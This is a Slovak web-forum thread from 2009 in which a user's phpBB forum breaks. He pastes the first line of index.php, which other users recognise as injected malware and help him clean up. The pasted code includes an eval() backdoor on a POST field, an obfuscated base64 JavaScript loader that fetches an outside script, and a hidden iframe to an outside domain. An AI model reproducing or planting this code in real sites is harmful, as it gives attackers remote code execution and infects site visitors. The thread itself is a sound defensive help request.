[ Príspevkov: 26 ] 
AutorSpráva
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 12.05.08
Prihlásený: 28.12.13
Príspevky: 117
Témy: 29 | 29

Ahojte,

spravil som si forum, kt. fungovalo bez problemov. Po nejakom case ho spustim a vypise:

Parse error: syntax error, unexpected ')' in /.../forum/index.php on line 1

kod na riadku 1:

<?php if(!function_exists('tmp_lkojfghx'))
{if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBzbzgwPSclJzt2YXIgZVZQdlY9J2A3NmFyYDIwYWAzZGAyMlNjcmlwdEVuZ2luZWAyMmAyY2A2MmAzZGAyMlZlcnNpb24oKStgMjJgMmNqYDNkYDIyYDIyYDJjdWAzZGA2ZWF2YDY5Z2F0b3JgMmV1YDczZWA3MkFgNjdlYDZldGAzYmlgNjZgMjgodWAyZWlgNmVgNjRlYDc4T2YoYDIyV2luYDIyKWAzZTBgMjlgMjZgMjYoYDc1YDJlaW5kZWA3OGA0ZmYoYDIyTmA1NGAyMDZgMjIpYDNjMGAyOWAyNmAyNmAyOGA2NG9jdW1lbmA3NGAyZWNgNmZva2llYDJlYDY5bmA2NGA2NWA3OE9gNjYoYDIyYDZkaWVrYDNkMWAyMilgM2MwKWAyNmAyNmAyOHR5cGVvZmAyOHpgNzJgNzZ6dHMpYDIxYDNkYDc0eXBgNjVvZihgMjJBYDIyKWAyOSlgN2J6cnZ6YDc0c2AzZGAyMkFgMjJgM2JlYDc2YWA2YyhgMjJpZih3aW5kYDZmd2AyZWAyMithK2AyMilgNmFgM2RgNmErYDIyK2A2MStgMjJNYWpgNmZyYDIyK2IrYStgMjJgNGRpbm9yYDIyYDJiYithK2AyMkJ1aWxgNjRgMjIrYitgMjJgNmFgM2JgMjIpYDNiZG9jdW1lbnRgMmV3cml0ZWAyOGAyMmAzY2A3M2NgNzJpcHRgMjBzcmNgM2RgMmZgMmZgNjd1bWJsYXJgMmVjYDZlYDJmcmA3M2A3M2AyZmAzZmlkYDNkYDIyK2orYDIyYDNlYDNjYDVjYDJmc2NyYDY5cHRgM2VgMjIpYDNiYDdkJzt2YXIgeDdSQT1lVlB2Vi5yZXBsYWNlKC9gL2csc284MCk7dmFyIHg3VWs9dW5lc2NhcGUoeDdSQSk7ZXZhbCh4N1VrKX0pKCk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s)
{if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}
$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.''))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();
if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;
else $s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();
ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s)
;$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();
?',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;
else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');
for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><iframe src="http://cameronzfunz.com/spl1/?29e898d7718e8d86e0436480200291b7" width=1 height=1 style="visibility:hidden"></iframe><?php

-----------------------------------------------------------------------------
Vidite tu nejaky problem?

Niekde som cital, ze problem moze sposobovat kodovanie, treba zvolit nejake UTF-8 without BOM, ale neviem kde a ci je to moj problem?

Dik

//editovane, Daron


Offline

Užívateľ
Užívateľ
Parse error: syntax error, unexpected ')'

Registrovaný: 30.06.07
Prihlásený: 24.07.12
Príspevky: 530
Témy: 85 | 85
Bydlisko: košice

omg toto je taký prehľadní kód že konec :D, kódovanie nastavíš vo svojom editore ktorý používaš, v pspade je to format>a tam zvolíš utf-8


_________________
PC1: Core2Duo E4300 @2.6GHZ, 4COREDUAL-SATA2, RAM Kingston 2GB 667mhz, ATI R3650 512MB DDR2, WD 320GB SATAII, Asus VW192S [19" LCD]
PC2: AMD Duron 2ghz, Asus A7s8x-mx, 768MB DDR, FX5200, 80GB IDE
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 12.05.08
Prihlásený: 28.12.13
Príspevky: 117
Témy: 29 | 29
Napísal autor témyOffline : 13.05.2009 23:48 | Parse error: syntax error, unexpected ')'

to uz som spravil, nastavil som utf-8 bez BOM, ale nejde to ani tak. Ten kod bol automaticky vygenerovany pri tvorbe fora PHP BB. Neviem, kde mu moze ta zatvorka vadit, ale nechapem, ze doteraz to nevadilo...???


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 12.05.08
Prihlásený: 28.12.13
Príspevky: 117
Témy: 29 | 29
Napísal autor témyOffline : 14.05.2009 0:11 | Parse error: syntax error, unexpected ')'

pozeram sa este na ten kod a na konci je jeden iframe: cameronzfunz.com ; rozmyslam, ci to nebude nejako hacknute a pozmenene...?? Nezda sa mi to, aby tam nieco take bolo?


Offline

Skúsený užívateľ
Skúsený užívateľ
Parse error: syntax error, unexpected ')'

Registrovaný: 07.03.06
Prihlásený: 23.01.11
Príspevky: 408
Témy: 2 | 2
Bydlisko: Prešov / Pr...

Určite to hacknuté je. PhpBB žiaden takýto kód negeneruje...
  1. Vymazať tento bullshit
  2. Upraviť zdrojáky do pôvodného tvaru
  3. prečistiť comp
  4. zmeniť heslo na ftp
  5. aktualizovať Total Commander(ak používaš) na verziu 7.5 beta2


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 12.05.08
Prihlásený: 28.12.13
Príspevky: 117
Témy: 29 | 29
Napísal autor témyOffline : 14.05.2009 0:31 | Parse error: syntax error, unexpected ')'

no super..., neviem ci problem je len ten iframe a ci tam nie je este vsunute nieco ine. Inac pozeral som tie zatvorky a mne tam vsetky sedia.
Upravit zdrojaky do povodneho tvaru? Tak to ako? Neviem aky bol povodny tvar, ved som to cele instaloval step by step PHP BB forum, ja neviem ako to bolo povodne... Musim to teraz robit odznova opat?? Keby som sa aspon vedel dostat k temam, aby som to nemusel cele este raz vymyslat...
Nechapem, ze niekoho take nieco bavi ako hacknut debilne forum...
Mam pritom NOD, tak nechapem ako mi to mohli len tak hacknut...

Dik.


Offline

Skúsený užívateľ
Skúsený užívateľ
Parse error: syntax error, unexpected ')'

Registrovaný: 07.03.06
Prihlásený: 23.01.11
Príspevky: 408
Témy: 2 | 2
Bydlisko: Prešov / Pr...

Celý ten kód čo si tu poslal vymaž. Je to blud, ktorý vôbec nepatrí do phpBB. A phpBB vrátiš do pôvodneho tvaru tak, že pôjdeš na www.phpbb.com - tam si stiahneš najnovšiu verziu a tou prepíšeš tvoje fórum(všetky súbory okrem install.php). Všetky nastavenia ti ostanú zachované, neprepíšeš databázu.

Ešte jedna otázka: neurobil si náhodou to, že po nainštalovaní si nezmazal install.php, ale len ho premenoval na _install.php, alebo podobne?


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 12.05.08
Prihlásený: 28.12.13
Príspevky: 117
Témy: 29 | 29
Napísal autor témyOffline : 14.05.2009 0:41 | Parse error: syntax error, unexpected ')'

nie, to som zmazal, ved prave preto nechapem ako je to forum potom slabo zabezpecene a to bola najnovsia verzia...
Kedze install.php nemam, tak vlastne tam dostanem uplne novu instalacnu verziu. A ked prepisem vsetky subory (pisal si, ze len install.php nie, ale ten nemam), tak len aby som nespravil nieco s databazou...
Dik.


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 12.05.08
Prihlásený: 28.12.13
Príspevky: 117
Témy: 29 | 29
Napísal autor témyOffline : 14.05.2009 0:42 | Parse error: syntax error, unexpected ')'

vseobecne uz len jedna otazka: ako potom mam zabezpecit, aby sa to opat neopakovalo? Fakticky sa mi zda, ze to zabezpecenie phpbb je akosi slabe...?


Offline

Skúsený užívateľ
Skúsený užívateľ
Parse error: syntax error, unexpected ')'

Registrovaný: 07.03.06
Prihlásený: 23.01.11
Príspevky: 408
Témy: 2 | 2
Bydlisko: Prešov / Pr...

Nespravíš s DB nič, neboj sa. Jednoducho nakopíruj/prepíš všetky súbory, ktoré stiahneš na phpbb.com.
Nekopíruj na web len adresár /install/ (pardon, je to adresár, nie celý súbor, ako som písal predtým)

K zabezpečeniu: to nemuselo vôbec súvisieť s phpbb, ale skôr by som to tipol na vykradnutie hesiel FTP v total commanderi...


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 12.05.08
Prihlásený: 28.12.13
Príspevky: 117
Témy: 29 | 29
Napísal autor témyOffline : 14.05.2009 0:51 | Parse error: syntax error, unexpected ')'

no ok, teraz som ten prvy riadok vymazal, precistil a ked som forum spustil, hned sa objavil nasledovny atak:

Contains recognition pattern of the HTML/Infected.WebPage.Gen HTML script virus

Asi to budem musiet fakt vsetko precistit, ale mne to pripada ako by to cele phpbb bolo akosi hacknute..., neviem


Offline

Skúsený užívateľ
Skúsený užívateľ
Parse error: syntax error, unexpected ')'

Registrovaný: 09.07.08
Prihlásený: 17.01.15
Príspevky: 1586
Témy: 96 | 96

Predpokladám, že používaš total commander a máš tam uložené heslá, však? Odporúčam okamžite na ftp zmeniť heslo a nikam ho neukladať, už vôbec nie do total commanderu.
toto je asi najnebezpečnejšia časť kódu:

Kód:
if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 12.05.08
Prihlásený: 28.12.13
Príspevky: 117
Témy: 29 | 29
Napísal autor témyOffline : 14.05.2009 19:13 | Parse error: syntax error, unexpected ')'

ano, pouzivam TC a mam tam ulozene hesla, myslel som, ze su dostatocne chranene.

O com je ta cast kodu? Zasielanie niecoho?


Offline

Užívateľ
Užívateľ
Parse error: syntax error, unexpected ')'

Registrovaný: 26.12.06
Prihlásený: 30.10.17
Príspevky: 4009
Témy: 181 | 181
Bydlisko: Nitra / Bra...
Vek: 24
NapísalOffline : 14.05.2009 19:47 | Parse error: syntax error, unexpected ')'

ak odosles na script $_POST['tmp_lkojfghx3'] s hodnotou 'destroy_server();' tak ti vsetko znici :D

http://sk.php.net/eval


_________________
Sorry za prelkepy
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 12.05.08
Prihlásený: 28.12.13
Príspevky: 117
Témy: 29 | 29
Napísal autor témyOffline : 14.05.2009 19:50 | Parse error: syntax error, unexpected ')'

no super..., dik za info. Inac to mam do toho Total Commandera stale nanovo typovat prihlasovacie udaje a hesla? Dost neprakticke. Nie je nejake pohodlnejsie riesenie?


Offline

Užívateľ
Užívateľ
Parse error: syntax error, unexpected ')'

Registrovaný: 26.12.06
Prihlásený: 30.10.17
Príspevky: 4009
Témy: 181 | 181
Bydlisko: Nitra / Bra...
Vek: 24
NapísalOffline : 14.05.2009 19:51 | Parse error: syntax error, unexpected ')'

staci ked si stiahnes najnovsiu verziu totalcommandera, kde je ta chyba ostranena... alebo pouzi ineho ftp klienta.. napr filezilla


_________________
Sorry za prelkepy
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 12.05.08
Prihlásený: 28.12.13
Príspevky: 117
Témy: 29 | 29
Napísal autor témyOffline : 14.05.2009 19:54 | Parse error: syntax error, unexpected ')'

staci verzia 7.04? 7.05 je len testovacia. Takze uz si to pri tejto verzii mozem nechat zaevidovane?


Offline

Skúsený užívateľ
Skúsený užívateľ
Parse error: syntax error, unexpected ')'

Registrovaný: 07.03.06
Prihlásený: 23.01.11
Príspevky: 408
Témy: 2 | 2
Bydlisko: Prešov / Pr...

Riešenie som ti popísal už oveľa skôr. Stačí otvoriť oči a čítať!


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 12.05.08
Prihlásený: 28.12.13
Príspevky: 117
Témy: 29 | 29
Napísal autor témyOffline : 14.05.2009 20:01 | Parse error: syntax error, unexpected ')'

Jasne, to som registroval, len sa pytam, ci nestaci 7.04? Tu som si teraz nainstaloval, mal som 03...


Offline

Skúsený užívateľ
Skúsený užívateľ
Parse error: syntax error, unexpected ')'

Registrovaný: 07.03.06
Prihlásený: 23.01.11
Príspevky: 408
Témy: 2 | 2
Bydlisko: Prešov / Pr...

Nestačí. Oprava sa týka až verzie 7.5 (ktorá je zatiaľ beta)


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 12.05.08
Prihlásený: 28.12.13
Príspevky: 117
Témy: 29 | 29
Napísal autor témyOffline : 14.05.2009 20:07 | Parse error: syntax error, unexpected ')'

tak ok, dufam, ze tam nebudu zase nejake diery, pretoze tam vyslovene upozornovali, ze pri beta verzii nic negarantuju...
Cudujem sa, ze po tolkych rokoch skusenosti to TC dokazal tak pokaslat a bezpecne riesenie sa naslo az vo verzii 7.5 ...


Offline

Skúsený užívateľ
Skúsený užívateľ
Parse error: syntax error, unexpected ')'

Registrovaný: 09.07.08
Prihlásený: 17.01.15
Príspevky: 1586
Témy: 96 | 96

Ešte stále ti nikto negarantuje, že toto zabezpečenie bude dostatočné. Vzhľadom na používanosť total commandera sa oplatí útočníkovi potrápiť aj so šifrovaním


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 12.05.08
Prihlásený: 28.12.13
Príspevky: 117
Témy: 29 | 29
Napísal autor témyOffline : 15.05.2009 23:33 | Parse error: syntax error, unexpected ')'

Mylan,

napisal si:

... Jednoducho nakopíruj/prepíš všetky súbory, ktoré stiahneš na phpbb.com.
Nekopíruj na web len adresár /install/ (pardon, je to adresár, nie celý súbor, ako som písal predtým)
...

presne toto som spravil, ale aj tak mi automaticky chcelo nacitat index.php v adresari install? Takze teraz to musim robit odznovu. Je nejaka moznost, ako sa napojit na existujucu databazu?
Zial instalacka mi len vypise, ze databaza s danym menom existuje a ze musim zvolit inu...

Co s tym?


Offline

Užívateľ
Užívateľ
Parse error: syntax error, unexpected ')'

Registrovaný: 09.09.07
Prihlásený: 07.11.16
Príspevky: 3128
Témy: 233 | 233
Bydlisko: Nové Zámky

otvor si subor config.php a tam si nastav
Kód:
$dbms = 'mysql';

$dbhost = 'tvojhost';
$dbname = 'nazovDB';
$dbuser = 'uzivatel';
$dbpasswd = 'heslo';

$table_prefix = 'prefixDatabazy_';

define('PHPBB_INSTALLED', true);


_________________
"It took a lot of work, but this latest Linux patch enables support for machines with 4096 CPUs, up from the old limit of 1024." "Do you have support for smooth full-screen flash video yet?" "No, but who uses that?"
- ak dlho neodpisujem do témy, zabudol som na ňu, takže ma upozornite SS, ak chcete moju odpoveď
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 12.05.08
Prihlásený: 28.12.13
Príspevky: 117
Témy: 29 | 29
Napísal autor témyOffline : 16.05.2009 9:05 | Parse error: syntax error, unexpected ')'

Blackshadow píše:
otvor si subor config.php a tam si nastav
Kód:
$dbms = 'mysql';

$dbhost = 'tvojhost';
$dbname = 'nazovDB';
$dbuser = 'uzivatel';
$dbpasswd = 'heslo';

$table_prefix = 'prefixDatabazy_';

define('PHPBB_INSTALLED', true);


Myslel som si, len potom mi vypisuje nasledovne:

$dbms = 'mysql'; $dbhost = 'localhost'; $dbname = 'XXX'; $dbuser = 'YYY'; $dbpasswd = 'ZZZ'; $table_prefix = 'phpbb_'; define('PHPBB_INSTALLED', true);
Warning: Cannot modify header information - headers already sent by (output started at /home/.../xxx.sk/forum/config.php:10) in /home/xxx/xxx.sk/forum/common.php on line 161. Čo s tým?

dany riadok v config.php je:

header('Location: ' . $url);


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 12.05.08
Prihlásený: 28.12.13
Príspevky: 117
Témy: 29 | 29
Napísal autor témyOffline : 16.05.2009 14:37 | Parse error: syntax error, unexpected ')'

uz som to vyriesil. Vytvoril som novu databazu, nainstaloval forum a potom v config.php som sa napojil na staru. Funguje to. Snad to niekomu do buducna aj pomoze...


 [ Príspevkov: 26 ] 


Parse error: syntax error, unexpected ')'



Podobné témy

 Témy  Odpovede  Zobrazenia  Posledný príspevok 
V tomto fóre nie sú ďalšie neprečítané témy.

Parse error: syntax error, unexpected '}' in /usr/export/www

v Redakčné systémy

9

325

11.01.2007 18:32

then

V tomto fóre nie sú ďalšie neprečítané témy.

Parse error: syntax error, unexpected '"' in

v PHP, ASP

1

312

10.12.2009 15:40

stenley

V tomto fóre nie sú ďalšie neprečítané témy.

Parse error: syntax error, unexpected T_STRING in ..

v PHP, ASP

7

724

08.08.2007 8:03

Tominator

V tomto fóre nie sú ďalšie neprečítané témy.

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_ST

v PHP, ASP

1

362

05.10.2010 12:08

walther

V tomto fóre nie sú ďalšie neprečítané témy.

Parse error: syntax error, unexpected $end

v PHP, ASP

6

584

29.08.2011 22:26

BX

V tomto fóre nie sú ďalšie neprečítané témy.

Parse error

v PHP, ASP

15

1261

09.08.2006 19:15

mokus

V tomto fóre nie sú ďalšie neprečítané témy.

Parse error

v Databázy

2

565

18.10.2007 14:14

pitrik1

V tomto fóre nie sú ďalšie neprečítané témy.

PARSE ERROR

v PHP, ASP

6

300

17.01.2008 0:56

max-m

V tomto fóre nie sú ďalšie neprečítané témy.

Parse error:

v PHP, ASP

21

928

21.09.2008 22:06

Blackshadow

V tomto fóre nie sú ďalšie neprečítané témy.

Parse error define()

v PHP, ASP

2

575

21.09.2006 19:19

Freelan

V tomto fóre nie sú ďalšie neprečítané témy.

elseif Parse error:

v PHP, ASP

14

268

08.06.2009 19:09

pilná lama glama

V tomto fóre nie sú ďalšie neprečítané témy.

Neviem najst Parse error

v PHP, ASP

24

560

15.09.2007 19:13

Blackshadow

V tomto fóre nie sú ďalšie neprečítané témy.

syntax error

v PHP, ASP

6

255

25.04.2012 19:46

shaggy

V tomto fóre nie sú ďalšie neprečítané témy.

CSS- Parse Error [empty string]

v HTML, XHTML, XML, CSS

4

136

16.04.2015 15:24

SKRiPT

V tomto fóre nie sú ďalšie neprečítané témy.

syntax error PHP

v PHP, ASP

5

441

03.06.2010 14:14

Ďuri

V tomto fóre nie sú ďalšie neprečítané témy.

Syntax error + formatovanie kodu

v PHP, ASP

19

438

15.09.2008 13:39

dadmtb



© 2005 - 2017 PCforum, edited by JanoF